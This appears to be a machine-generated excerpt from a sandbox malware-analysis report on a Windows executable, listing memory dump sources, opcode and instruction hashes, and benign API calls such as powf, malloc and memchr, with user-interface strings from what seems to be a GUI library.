                                                                                                                                                                                                              • Opcode Fuzzy Hash: 149ae9741bd631a9e052683c4a4dc1564fe2eb0373ebb708d7a9a0031ebeafb6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A31D922B19643A2FB14BF11E89437AE3A2FF44FA0F884530DA8D47B94DE7CE4419790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqrtf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 321154650-0
                                                                                                                                                                                                              • Opcode ID: 53e937f76fa802f9a2fbd5659d7d97ef88ec443a31b64e0ae8af81f48bdbba85
                                                                                                                                                                                                              • Instruction ID: 330734b600ecc4824ccaff59a55e14bb04f77c34f8db8064baf7115ef8e4d3f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e937f76fa802f9a2fbd5659d7d97ef88ec443a31b64e0ae8af81f48bdbba85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF923C33A24B899AD712CF3784811ADB760FF6DB84719D716EA0827761DB34F1A5EB00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqrtf
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 321154650-3887548279
                                                                                                                                                                                                              • Opcode ID: 8a7587682bf8e77970766eee19c9873103fcb7ac3d1be58dc4a40e3528555d8d
                                                                                                                                                                                                              • Instruction ID: 6533476be6a50fbf9f67344496b5de6d617739eea2c82302ec1859c7e4832b5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a7587682bf8e77970766eee19c9873103fcb7ac3d1be58dc4a40e3528555d8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B129733924BC995D312DF3784822ADB361FF6DB88B5AD722EA0933665DB34B191D700
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB3280: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB32B3
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB3280: memmove.VCRUNTIME140 ref: 00007FF735DB32CF
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB3280: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB32EF
                                                                                                                                                                                                              • memchr.VCRUNTIME140 ref: 00007FF735DAC0FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemallocmemchrmemmove
                                                                                                                                                                                                              • String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                                                              • API String ID: 837623554-4275869412
                                                                                                                                                                                                              • Opcode ID: f3fdd610339c870ffcb6d935aff851ddff91c481497ef150e6b16470cbd16cda
                                                                                                                                                                                                              • Instruction ID: 9d950dc7719193a1c8fd3c9cdb10fcb9b30eed56eef2c3e9c806fd669b8f9f35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3fdd610339c870ffcb6d935aff851ddff91c481497ef150e6b16470cbd16cda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25920A33A14BC6ABE715DB36C5802E9F3A0FF59754F488735DB18676A1DB38B0A09B10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1671641884-0
                                                                                                                                                                                                              • Opcode ID: ac004c46bf0219cfccfdba9d71a28d15240b7af4034fff980dd1efa853c164b3
                                                                                                                                                                                                              • Instruction ID: f00c6503e9b02c2e4ecff476d63c8e777cb3232a1f229da28379559bc0c2619e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac004c46bf0219cfccfdba9d71a28d15240b7af4034fff980dd1efa853c164b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56D1E632919BC6A6E765DF26D0802B9F3A1FF58B84F488231DB4823360EF39E551DB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: 240b74ad42adf89183d43564f1c5106c68109b7536c76a6bf629c0e81fca2642
                                                                                                                                                                                                              • Instruction ID: 94d50a99ea2770484240fddc128459ab21093ab5419b5c2da2a4ef117e4f27f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 240b74ad42adf89183d43564f1c5106c68109b7536c76a6bf629c0e81fca2642
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B126E23D2DB8F51E613A63750812F9E2506F6EBC0F58CB32ED8D3A6A5DF287181A550
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memchr
                                                                                                                                                                                                              • String ID: ...
                                                                                                                                                                                                              • API String ID: 3297308162-440645147
                                                                                                                                                                                                              • Opcode ID: e9c7574d3c730807649c51f8e2cb472bd98aacfbb7cf540c450d26418fa25f29
                                                                                                                                                                                                              • Instruction ID: 06557ac8b601c0200db5bd724f6e902d9927ed97d3f891ebda1c14bed16e2bab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9c7574d3c730807649c51f8e2cb472bd98aacfbb7cf540c450d26418fa25f29
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF15E33D18BCA91E212973691813F9F350EF6EBC4F588732EA88365A1DF79A5C19740
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: 749167c5e655d41d55095cb4974c7058cc6ce89b9ab866a665848e8e023d0edf
                                                                                                                                                                                                              • Instruction ID: ae13e0cbefec0cb90062c3ffbaeac44cc16f91cb1ef1557f16767cb86db12517
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 749167c5e655d41d55095cb4974c7058cc6ce89b9ab866a665848e8e023d0edf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77E16D22D187CE55E213AB3755811B5E351EF6EFC4F5C8B32ED88362A1DF387181A660
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: 59f8129df68933931f5c6d552301edb6c0ca9d80d97bf828ad6066f13b71d3bb
                                                                                                                                                                                                              • Instruction ID: e33c7e6fb989ac9e3a5b372cf8e74c08931f4bdab0583b193c9abfead6c9cd23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59f8129df68933931f5c6d552301edb6c0ca9d80d97bf828ad6066f13b71d3bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E14B22D286CE95E663E73750811B9F350EF6EB84F5C9B32ED88761A1DF3871809650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                              • Opcode ID: 2a9044cefc9845f669aa88065a95f2b4573dcafd3f21c0fcbee61d9b121317c0
                                                                                                                                                                                                              • Instruction ID: b67bb2b9caaeb1b307b413f572da76ecbd53d4a923854384da20c8c49203f8c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a9044cefc9845f669aa88065a95f2b4573dcafd3f21c0fcbee61d9b121317c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D115A22B14F129AFB00EF70E8952B873A4FB18B58F840E31DA2D867A4DF7CD1948350
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                              • String ID: !x-sys-default-locale
                                                                                                                                                                                                              • API String ID: 4235545615-2729719199
                                                                                                                                                                                                              • Opcode ID: 72384d2fa61083b35fdda294e9dbef127bd343459967c3db0ddb212c398ecd12
                                                                                                                                                                                                              • Instruction ID: 10f9179e748a022fec059f3c1dd2e4133283f2870c3de9b9e3a80322ad9e2ef4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72384d2fa61083b35fdda294e9dbef127bd343459967c3db0ddb212c398ecd12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51018472B1878392F7599B12F88077AA7A1F784BD4F844035DA8D46A98CF3CE5449710
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: %*s%.*s$ %.*s
                                                                                                                                                                                                              • API String ID: 0-3400057116
                                                                                                                                                                                                              • Opcode ID: 15565355a38e31a9c43d3948f3f46918d3c0f15999e1d1242ac34b08c1786a07
                                                                                                                                                                                                              • Instruction ID: 08fd1a90b8354b41ae7ca19cec3366cebcddf3efd7c344065d25ff112b16018d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15565355a38e31a9c43d3948f3f46918d3c0f15999e1d1242ac34b08c1786a07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A224572E18687A5E711EB3694801FEF360FF59B58F848335DE98176A4EF38A044EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB834C
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB8379
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB83A0
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB83C3
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBACC7
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB9C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9CFA
                                                                                                                                                                                                                • Part of subcall function 00007FF735DB9250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB9352
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBAC8B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBACA6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$ceilffloorfmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 573317343-0
                                                                                                                                                                                                              • Opcode ID: b272a0d186d7ca9dc89a1e5bc61e875377835f1e2c59331d1577e9d413d7d3b2
                                                                                                                                                                                                              • Instruction ID: 1503f0435e8a8cb9cf5c2857b321f908c65326605e51d357b21a9f787c88deb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b272a0d186d7ca9dc89a1e5bc61e875377835f1e2c59331d1577e9d413d7d3b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9712DF32A18B959AE311CB35D0806BDB7B5FF5D784F058336EE88A3654EB38E491DB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: afd8212adba07f9817480506c6e31eebf85320f67040c25655b48eb84f541a2b
                                                                                                                                                                                                              • Instruction ID: 96e659d0050bdd2817b9c2b4319cf7b70258782b4912d707bd0c333855493fc9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: afd8212adba07f9817480506c6e31eebf85320f67040c25655b48eb84f541a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52415E02E38B8E56E817A23650429B9C5D16FEABC4D9CC732E94F31791FB3C71D2A510
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #SCROLLX$#SCROLLY
                                                                                                                                                                                                              • API String ID: 0-350977493
                                                                                                                                                                                                              • Opcode ID: a2a48a90be6ed4dde7050a14f79263956d374721b7953dcf6fce21e3f0767ab4
                                                                                                                                                                                                              • Instruction ID: 62726232802a965e58b74947a07fc4b4ea92419aa113ed18afa8fdc61fa61e67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a48a90be6ed4dde7050a14f79263956d374721b7953dcf6fce21e3f0767ab4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7120B22D28BCD95E213DA3790821B9F350EF7E784F68D723FD85365A2DB24B0D19A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF735DC0BFC
